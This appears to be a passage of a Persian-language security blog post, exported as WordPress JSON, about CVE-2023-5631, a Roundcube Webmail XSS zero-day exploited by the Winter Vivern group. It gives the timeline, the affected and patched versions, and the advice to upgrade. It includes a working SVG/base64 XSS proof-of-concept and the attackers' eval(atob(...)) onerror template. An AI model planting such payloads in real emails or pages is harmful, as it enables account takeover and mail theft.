{"id":50682,"date":"2023-10-28T14:59:01","date_gmt":"2023-10-28T11:59:01","guid":{"rendered":"https:\/\/onhexgroup.ir\/?p=4950"},"modified":"2023-10-31T08:46:33","modified_gmt":"2023-10-31T05:16:33","slug":"%d8%a2%d8%b3%db%8c%d8%a8-%d9%be%d8%b0%db%8c%d8%b1%db%8c-%d8%b2%db%8c%d8%b1%d9%88%d8%af%db%8c-%d8%af%d8%b1-roundcube-webmail-%d9%87%d8%af%d9%81-%d9%87%da%a9%d8%b1%d9%87%d8%a7%db%8c-%d8%b1%d9%88%d8%b3","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/%d8%a2%d8%b3%db%8c%d8%a8-%d9%be%d8%b0%db%8c%d8%b1%db%8c-%d8%b2%db%8c%d8%b1%d9%88%d8%af%db%8c-%d8%af%d8%b1-roundcube-webmail-%d9%87%d8%af%d9%81-%d9%87%da%a9%d8%b1%d9%87%d8%a7%db%8c-%d8%b1%d9%88%d8%b3\/","title":{"rendered":"\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0632\u06cc\u0631\u0648\u062f\u06cc \u062f\u0631 Roundcube Webmail \u0647\u062f\u0641 \u0647\u06a9\u0631\u0647\u0627\u06cc \u0631\u0648\u0633\u06cc"},"content":{"rendered":"<p><span class=\"rt-reading-time\"><span class=\"rt-label rt-prefix\">\u0632\u0645\u0627\u0646 \u0645\u0637\u0627\u0644\u0639\u0647: <\/span> <span class=\"rt-time\">4<\/span> <span class=\"rt-label rt-postfix\">\u062f\u0642\u06cc\u0642\u0647<\/span><\/span><\/p>\n<p>\u0645\u062d\u0642\u0642\u0627\u06cc ESET \u06cc\u0647 \u06af\u0632\u0627\u0631\u0634\u06cc \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f\u0646 \u062f\u0631 \u062e\u0635\u0648\u0635 \u06cc\u0647 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0632\u06cc\u0631\u0648\u062f\u06cc XSS \u062f\u0631 Roundcube Webmail \u06a9\u0647 \u0627\u062e\u06cc\u0631\u0627 \u06af\u0631\u0648\u0647 \u0647\u06a9\u0631\u06cc \u0631\u0648\u0633\u06cc Winter Vivern \u0628\u0627\u0647\u0627\u0634 \u0646\u0647\u0627\u062f\u0647\u0627\u06cc \u062f\u0648\u0644\u062a\u06cc \u0648 \u06cc\u0647 \u0627\u062a\u0627\u0642 \u0641\u06a9\u0631 \u062f\u0631 \u0627\u0631\u0648\u067e\u0627 \u0631\u0648 \u0647\u06a9 \u06a9\u0631\u062f\u0646.<\/p>\n<p>\u062c\u062f\u0648\u0644 \u0632\u0645\u0627\u0646\u06cc 
\u0627\u0641\u0634\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc :<\/p>\n<ul>\n<li>12 \u0627\u06a9\u062a\u0628\u0631 2023 : \u0645\u062d\u0642\u0642\u0627\u06cc ESET \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648 \u0628\u0647 \u062a\u06cc\u0645 Roundcube \u06af\u0632\u0627\u0631\u0634 \u062f\u0627\u062f\u0646.<\/li>\n<li>14 \u0627\u06a9\u062a\u0628\u0631 2023 : \u062a\u06cc\u0645 Roundcube \u060c \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648 \u062a\u0627\u06cc\u06cc\u062f \u0648 \u0627\u0648\u0646\u0648 \u0627\u0635\u0644\u0627\u062d \u06a9\u0631\u062f\u0647.<\/li>\n<li>16 \u0627\u06a9\u062a\u0628\u0631 2023 : \u0627\u0635\u0644\u0627\u062d\u06cc\u0647 \u0647\u0627\u06cc\u06cc \u0631\u0648 \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f\u0647 (1.6.4, 1.5.5, 1.4.15)<\/li>\n<li>18 \u0627\u06a9\u062a\u0628\u0631 2023 : ESET CNA \u06cc\u0647 CVE \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u0631\u0627\u0626\u0647 \u062f\u0627\u062f\u0647.<\/li>\n<li>25 \u0627\u06a9\u062a\u0628\u0631 2023 : \u06af\u0632\u0627\u0631\u0634 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648 \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f\u0646.<\/li>\n<\/ul>\n<p>\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u0632 \u0646\u0648\u0639 XSS \u0647\u0633\u062a\u0634 \u0648 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0628\u0627 \u0627\u0631\u0633\u0627\u0644 \u06cc\u0647 \u0627\u06cc\u0645\u06cc\u0644 \u0648 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0646 \u062a\u06af SVG \u0645\u062e\u0631\u0628 \u062f\u0631 \u0633\u0648\u0631\u0633 HTML \u060c \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0648 \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 
\u062c\u0627\u0648\u0627\u0627\u0633\u06a9\u0631\u06cc\u067e\u062a \u0631\u0648 \u0631\u0648\u0634 \u0627\u062c\u0631\u0627 \u06a9\u0646\u0647\u060c \u06a9\u0647 \u0645\u0639\u0645\u0648\u0644\u0627 \u0628\u0631\u0627\u06cc \u0633\u0631\u0642\u062a \u0627\u06cc\u0645\u06cc\u0644\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u0627\u06a9\u0627\u0646\u062a \u06cc\u0627 \u0645\u0648\u0627\u0631\u062f \u062f\u06cc\u06af\u0647 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0628\u0634\u0647.<\/p>\n<p>\u0645\u062b\u0644\u0627 \u06a9\u062f \u0632\u06cc\u0631 \u062f\u0631 \u0633\u0648\u0631\u0633 HTML \u0627\u06cc\u0645\u06cc\u0644 \u0642\u0631\u0627\u0631 \u0628\u062f\u06cc\u062f \u0648 \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u06cc\u062f :<\/p>\n<p><!-- Urvanov Syntax Highlighter v2.8.34 --><\/p>\n<div id=\"urvanov-syntax-highlighter-653cef69cd5d0632739065\" class=\"urvanov-syntax-highlighter-syntax crayon-theme-bncplusplus urvanov-syntax-highlighter-font-tahoma urvanov-syntax-highlighter-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"urvanov-syntax-highlighter-plain-wrap\"><textarea class=\"urvanov-syntax-highlighter-plain print-no\" readonly=\"readonly\" wrap=\"soft\" data-settings=\"dblclick\"> &lt;svg&gt;&lt;use href=&#8221;dAta:image\/s\tvg+xml;base64,PHN2ZyBpZD0ieDIiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+IDxpbWFnZSBocmVmPSJ4IiBvbmVycm9yPSJhbGVydCgyMzQpIiAvPjwvc3ZnPg==#x2&#8243;&gt;<\/textarea><\/div>\n<div class=\"urvanov-syntax-highlighter-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"urvanov-syntax-highlighter-row\">\n<td class=\"crayon-nums \" data-settings=\"show\"><\/td>\n<td class=\"urvanov-syntax-highlighter-code\">\n<div class=\"crayon-pre\">\n<div id=\"urvanov-syntax-highlighter-653cef69cd5d0632739065-1\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-o\">&lt;<\/span><span 
class=\"crayon-v\">svg<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-st\">use<\/span> <span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;dAta:image\/s vg+xml;base64,PHN2ZyBpZD0ieDIiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+IDxpbWFnZSBocmVmPSJ4IiBvbmVycm9yPSJhbGVydCgyMzQpIiAvPjwvc3ZnPg==#x2&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><!-- [Format Time: 0.0010 seconds] --><\/p>\n<p>\u0645\u0648\u0642\u0639 \u0628\u0627\u0632 \u06a9\u0631\u062f\u0646 \u0627\u06cc\u0645\u06cc\u0644 \u060c \u06a9\u062f \u0632\u06cc\u0631 \u0627\u062c\u0631\u0627 \u0645\u06cc\u0634\u0647 :<\/p>\n<p><!-- Urvanov Syntax Highlighter v2.8.34 --><\/p>\n<div id=\"urvanov-syntax-highlighter-653cef69cd5ec066355435\" class=\"urvanov-syntax-highlighter-syntax crayon-theme-bncplusplus urvanov-syntax-highlighter-font-tahoma urvanov-syntax-highlighter-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"urvanov-syntax-highlighter-plain-wrap\"><textarea class=\"urvanov-syntax-highlighter-plain print-no\" readonly=\"readonly\" wrap=\"soft\" data-settings=\"dblclick\">&lt;br \/&gt;<br \/>\n&lt;svg id=&#8221;x2&#8243; xmlns=&#8221;http:\/\/www.w3.org\/2000\/svg&#8221;&gt; &lt;image href=&#8221;x&#8221; onerror=&#8221;alert(234)&#8221; \/&gt;&lt;\/svg&gt;<\/textarea><\/div>\n<div class=\"urvanov-syntax-highlighter-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"urvanov-syntax-highlighter-row\">\n<td class=\"crayon-nums \" data-settings=\"show\"><\/td>\n<td class=\"urvanov-syntax-highlighter-code\">\n<div class=\"crayon-pre\">\n<div id=\"urvanov-syntax-highlighter-653cef69cd5ec066355435-1\" class=\"crayon-line\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">svg <\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-o\">=<\/span><span 
class=\"crayon-s\">&#8220;x2&#8221;<\/span> <span class=\"crayon-v\">xmlns<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;http:\/\/www.w3.org\/2000\/svg&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">image <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;x&#8221;<\/span> <span class=\"crayon-v\">onerror<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;alert(234)&#8221;<\/span> <span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">svg<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><!-- [Format Time: 0.0002 seconds] --><\/p>\n<p>Roundcube \u06cc\u0647 \u0627\u0628\u0632\u0627\u0631 \u0645\u062a\u0646 \u0628\u0627\u0632 \u0647\u0633\u062a\u0634 \u06a9\u0647 \u0639\u0645\u062f\u062a\u0627 \u062f\u0631 \u0628\u062e\u0634 \u0627\u06cc\u0645\u06cc\u0644 \u0633\u0627\u06cc\u062a\u0647\u0627 \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u0645\u06cc\u06af\u06cc\u0631\u0647. 
\u0645\u062b\u0644\u0627 CPanel \u0634\u0627\u0645\u0644 \u0627\u06cc\u0646 \u0627\u0628\u0632\u0627\u0631 \u0647\u0633\u062a\u0634.<\/p>\n<p>\u0646\u0633\u062e\u0647 \u0647\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 :<\/p>\n<p>\u0646\u0633\u062e\u0647 \u0647\u0627\u06cc \u0642\u0628\u0644 \u0627\u0632 <a href=\"https:\/\/github.com\/roundcube\/roundcubemail\/releases\/tag\/1.4.15\" target=\"_blank\" rel=\"noopener\">1.4.15<\/a> \u0648 <a href=\"https:\/\/github.com\/roundcube\/roundcubemail\/releases\/tag\/1.5.5\" target=\"_blank\" rel=\"noopener\">1.5.5<\/a> \u0648 <a href=\"https:\/\/github.com\/roundcube\/roundcubemail\/releases\/tag\/1.6.4\" target=\"_blank\" rel=\"noopener\">1.6.4<\/a> (\u06cc\u0639\u0646\u06cc \u0647\u0645\u0647 \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc \u0642\u0628\u0644 \u0627\u0632 1.4.15\u060c \u0634\u0627\u062e\u0647 1.5.x \u0642\u0628\u0644 \u0627\u0632 1.5.5 \u0648 \u0634\u0627\u062e\u0647 1.6.x \u0642\u0628\u0644 \u0627\u0632 1.6.4)<\/p>\n<p>\u0646\u0633\u062e\u0647 \u0647\u0627\u06cc\u00a0 \u0627\u0635\u0644\u0627\u062d \u0634\u062f\u0647 :<\/p>\n<p>\u0628\u0631\u0627\u06cc \u0627\u06cc\u0646\u06a9\u0647 \u062a\u062d\u062a \u062a\u0627\u062b\u06cc\u0631 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0642\u0631\u0627\u0631 \u0646\u06af\u06cc\u0631\u06cc\u062f\u060c \u0628\u0627\u06cc\u062f \u0628\u0633\u062a\u0647 \u0628\u0647 \u0634\u0627\u062e\u0647 \u0627\u06cc \u06a9\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u06a9\u0646\u06cc\u062f\u060c \u0628\u0647 \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc 1.4.15 \u06cc\u0627 1.5.5 \u06cc\u0627 1.6.4 \u0627\u0631\u062a\u0642\u0627\u0621 \u0628\u062f\u06cc\u062f.<\/p>\n<p>\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0637\u0648\u0631\u06cc \u0647\u0633\u062a\u0634 \u06a9\u0647 \u0628\u0627 \u0628\u0627\u0632 \u06a9\u0631\u062f\u0646 \u0627\u06cc\u0645\u06cc\u0644 \u0645\u062e\u0631\u0628\u060c \u0647\u06a9 \u0645\u06cc\u0634\u06cc\u062f\u060c \u0628\u0646\u0627\u0628\u0631\u0627\u06cc\u0646 \u062a\u0648\u0635\u06cc\u0647 \u0634\u062f\u0647\u060c \u062d\u062a\u0645\u0627 \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0631\u0648 \u0627\u0639\u0645\u0627\u0644 \u06a9\u0646\u06cc\u062f.<\/p>\n<h2>\u06af\u0631\u0648\u0647 \u0647\u06a9\u0631\u06cc Winter Vivern :<\/h2>\n<p>\u06af\u0631\u0648\u0647 \u0647\u06a9\u0631\u06cc Winter Vivern \u06a9\u0647 
\u0642\u0628\u0644\u0627 \u0647\u0645 \u0645\u0637\u0627\u0644\u0628\u06cc \u062f\u0631 \u062e\u0635\u0648\u0635\u0634\u0648\u0646 \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f\u06cc\u0645\u060c \u06cc\u0647 \u06af\u0631\u0648\u0647 \u0647\u06a9\u0631\u06cc \u062c\u0627\u0633\u0648\u0633\u06cc \u0647\u0633\u062a\u0634\u060c \u06a9\u0647 \u0627\u0648\u0644\u06cc\u0646 \u0628\u0627\u0631 \u062f\u0631 \u0633\u0627\u0644 2021 \u062a\u0648\u0633\u0637 <a href=\"https:\/\/www.domaintools.com\/resources\/blog\/winter-vivern-a-look-at-re-crafted-government-maldocs\/\" target=\"_blank\" rel=\"noopener\">DomainTools<\/a> \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f. \u0627\u062d\u062a\u0645\u0627\u0644 \u0645\u06cc\u062f\u0646 \u062d\u062f\u0627\u0642\u0644 \u0627\u0632 \u0633\u0627\u0644 2020 \u0641\u0639\u0627\u0644 \u0647\u0633\u062a\u0634 \u0648 \u0639\u0645\u062f\u062a\u0627 \u06a9\u0634\u0648\u0631\u0647\u0627\u06cc \u0627\u0631\u0648\u067e\u0627\u06cc\u06cc \u0648 \u0622\u0633\u06cc\u0627\u06cc \u0645\u0631\u06a9\u0632\u06cc \u0631\u0648 \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u0645\u06cc\u062f\u0647. \u062a\u0627\u06a9\u062a\u06cc\u06a9\u0647\u0627\u06cc\u06cc \u0647\u0645 \u06a9\u0647 \u0627\u063a\u0644\u0628 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u06a9\u0646\u0646\u060c \u0627\u0633\u0646\u0627\u062f \u0645\u062e\u0631\u0628 \u060c \u0628\u06a9\u062f\u0648\u0631\u0647\u0627\u06cc \u067e\u0627\u0648\u0631\u0634\u0644\u06cc \u0648 \u0633\u0627\u06cc\u062a\u0647\u0627\u06cc \u0641\u06cc\u0634\u06cc\u0646\u06af \u0647\u0633\u062a\u0634. 
\u0645\u062d\u0642\u0642\u0627\u06cc ESET \u0645\u0639\u062a\u0642\u062f\u0646\u062f \u06a9\u0647 \u0627\u06cc\u0646 \u06af\u0631\u0648\u0647 \u060c \u0628\u0627 \u06af\u0631\u0648\u0647 <a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus\/\" target=\"_blank\" rel=\"noopener\">MoustachedBouncer<\/a> \u06a9\u0647 \u0647\u0645\u0633\u0648 \u0628\u0627 \u0628\u0644\u0627\u0631\u0648\u0633 \u0647\u0633\u062a\u0634\u060c \u0627\u0631\u062a\u0628\u0627\u0637 \u062f\u0627\u0631\u0647.<\/p>\n<p>Winter Vivern \u062a\u0642\u0631\u06cc\u0628\u0627 \u0627\u0632 \u0633\u0627\u0644 2022 \u0634\u0631\u0648\u0639 \u0628\u0647 \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0646 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0627\u06cc\u0645\u06cc\u0644 Zimbra \u0648 Roundcube \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 \u0646\u0647\u0627\u062f\u0647\u0627\u06cc \u062f\u0648\u0644\u062a\u06cc\u00a0 \u06a9\u0631\u062f\u0647. \u0645\u062b\u0644\u0627 \u062f\u0631 \u0622\u06af\u0648\u0633\u062a \u0648 \u0633\u067e\u062a\u0627\u0645\u0628\u0631 2023 \u060c \u0627\u06cc\u0646 \u06af\u0631\u0648\u0647 \u0627\u0632 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc XSS \u0628\u0647 \u0634\u0646\u0627\u0633\u0647 CVE-2020-35730 \u062f\u0631 Roundcube \u0628\u0631\u0627\u06cc \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0646 \u0642\u0631\u0628\u0627\u0646\u06cc\u0627\u0634\u060c \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647. 
\u0627\u0644\u0628\u062a\u0647 \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u06af\u0631\u0648\u0647 <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/white-papers\/eset-sednit-full.pdf\" target=\"_blank\" rel=\"noopener\">Sednit<\/a> \u06a9\u0647 \u0628\u0647 APT28 \u0647\u0645 \u0645\u0639\u0631\u0648\u0641 \u0647\u0633\u062a\u0646\u060c \u0647\u0645 \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647.<\/p>\n<h2>\u062c\u0632\u06cc\u06cc\u0627\u062a \u0641\u0646\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc :<\/h2>\n<p>\u0628\u0631\u0627\u06cc \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc CVE-2023-5631 \u060c \u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u06cc\u062f \u06cc\u0647 \u0627\u06cc\u0645\u06cc\u0644 \u0645\u062e\u0631\u0628 \u0631\u0648 \u0628\u0633\u0627\u0632\u0647 \u0648 \u0628\u0647 \u0642\u0631\u0628\u0627\u0646\u06cc \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u0647. 
\u062f\u0631 \u0627\u06cc\u0646 \u06a9\u0645\u067e\u06cc\u0646\u060c \u0627\u06cc\u0646 \u06af\u0631\u0648\u0647 \u06cc\u0647 \u0627\u06cc\u0645\u06cc\u0644 \u0627\u0632 team.managment@outlook[.]com \u0648 \u0628\u0627 \u0645\u0648\u0636\u0648\u0639 Get started in your Outlook \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u06a9\u0646\u0647 :<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"not-transparent aligncenter size-full wp-image-4951\" src=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3.webp\" sizes=\"auto, (max-width: 466px) 100vw, 466px\" srcset=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3.webp 466w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-5.webp 282w\" alt=\"\u0627\u06cc\u0645\u06cc\u0644 \u0627\u0631\u0633\u0627\u0644\u06cc \u0627\u0632 wintervivern\" width=\"466\" height=\"496\" data-dominant-color=\"f3f3f4\" data-has-transparency=\"false\" title=\"\"><\/p>\n<p>\u0627\u06cc\u0646 \u0627\u06cc\u0645\u06cc\u0644 \u062f\u0631 \u0646\u06af\u0627\u0647 \u0627\u0648\u0644\u060c \u0645\u062e\u0631\u0628 \u0628\u0647 \u0646\u0638\u0631 \u0646\u0645\u06cc\u0627\u062f \u0627\u0645\u0627 \u0627\u06af\u0647 \u06a9\u062f\u0647\u0627\u06cc HTML \u0627\u0648\u0646 \u0631\u0648 \u0645\u0634\u0627\u0647\u062f\u0647 \u06a9\u0646\u06cc\u062f\u060c \u0647\u0645\u0648\u0646\u0637\u0648\u0631 \u06a9\u0647 \u062f\u0631 \u0634\u06a9\u0644 \u0632\u06cc\u0631 \u0642\u0627\u0628\u0644 \u0645\u0634\u0627\u0647\u062f\u0647 \u0647\u0633\u062a\u0634\u060c \u062f\u0631 
\u0627\u0646\u062a\u0647\u0627\u06cc \u067e\u06cc\u0627\u0645 \u06cc\u0647 \u062a\u06af SVG \u0647\u0633\u062a\u0634 \u06a9\u0647 \u062d\u0627\u0648\u06cc \u06cc\u0647 \u067e\u06cc\u0644\u0648\u062f base64 \u0634\u062f\u0647 \u0647\u0633\u062a\u0634 :<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"not-transparent aligncenter size-full wp-image-4952\" src=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-1.webp\" sizes=\"auto, (max-width: 1129px) 100vw, 1129px\" srcset=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-1.webp 1129w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-6.webp 300w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-7.webp 1024w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-8.webp 768w\" alt=\"\u0633\u0648\u0631\u0633 \u06a9\u062f \u0627\u06cc\u0645\u06cc\u0644 \u0645\u062e\u0631\u0628\" width=\"1129\" height=\"994\" data-dominant-color=\"f6f6f5\" data-has-transparency=\"false\" title=\"\"><\/p>\n<p>\u0628\u0635\u0648\u0631\u062a \u062f\u0642\u06cc\u0642\u062a\u0631 :<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"not-transparent aligncenter size-full wp-image-4953\" 
src=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-2.webp\" sizes=\"auto, (max-width: 1261px) 100vw, 1261px\" srcset=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-2.webp 1261w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-9.webp 300w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-10.webp 1024w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-11.webp 768w\" alt=\"\u062a\u06af svg\" width=\"1261\" height=\"145\" data-dominant-color=\"f5f6f2\" data-has-transparency=\"false\" title=\"\"><\/p>\n<p>\u0627\u06af\u0647 \u0627\u06cc\u0646 \u0645\u0642\u062f\u0627\u0631 base64 \u0631\u0648 \u062f\u06cc\u06a9\u062f \u06a9\u0646\u06cc\u0645 (\u062f\u0631 \u0634\u06a9\u0644 \u0628\u0627\u0644\u0627 \u0645\u0642\u062f\u0627\u0631 \u067e\u06cc\u0644\u0648\u062f base64 \u0634\u062f\u0647 \u06a9\u0627\u0645\u0644 \u0646\u06cc\u0633\u062a \u0648 \u0648\u06cc\u0631\u0627\u06cc\u0634 \u0634\u062f\u0647 \u0647\u0633\u062a\u0634)\u060c \u0628\u0647 \u06a9\u062f \u0632\u06cc\u0631 \u0645\u06cc\u0631\u0633\u06cc\u0645 :<\/p>\n<p><!-- Urvanov Syntax Highlighter v2.8.34 --><\/p>\n<div id=\"urvanov-syntax-highlighter-653cef69cd5f2883353949\" class=\"urvanov-syntax-highlighter-syntax 
crayon-theme-bncplusplus urvanov-syntax-highlighter-font-tahoma urvanov-syntax-highlighter-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"urvanov-syntax-highlighter-plain-wrap\"><textarea class=\"urvanov-syntax-highlighter-plain print-no\" readonly=\"readonly\" wrap=\"soft\" data-settings=\"dblclick\">&lt;br \/&gt;<br \/>\n&lt;svg id=&#8221;x&#8221; xmlns=&#8221;http:\/\/www.w3.org\/2000\/svg&#8221;&gt; &lt;image href=&#8221;x&#8221; onerror=&#8221;eval(atob(&#8216;&lt;base64-encoded payload&gt;&#8217;))&#8221; \/&gt;&lt;\/svg&gt;<\/textarea><\/div>\n<div class=\"urvanov-syntax-highlighter-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"urvanov-syntax-highlighter-row\">\n<td class=\"crayon-nums \" 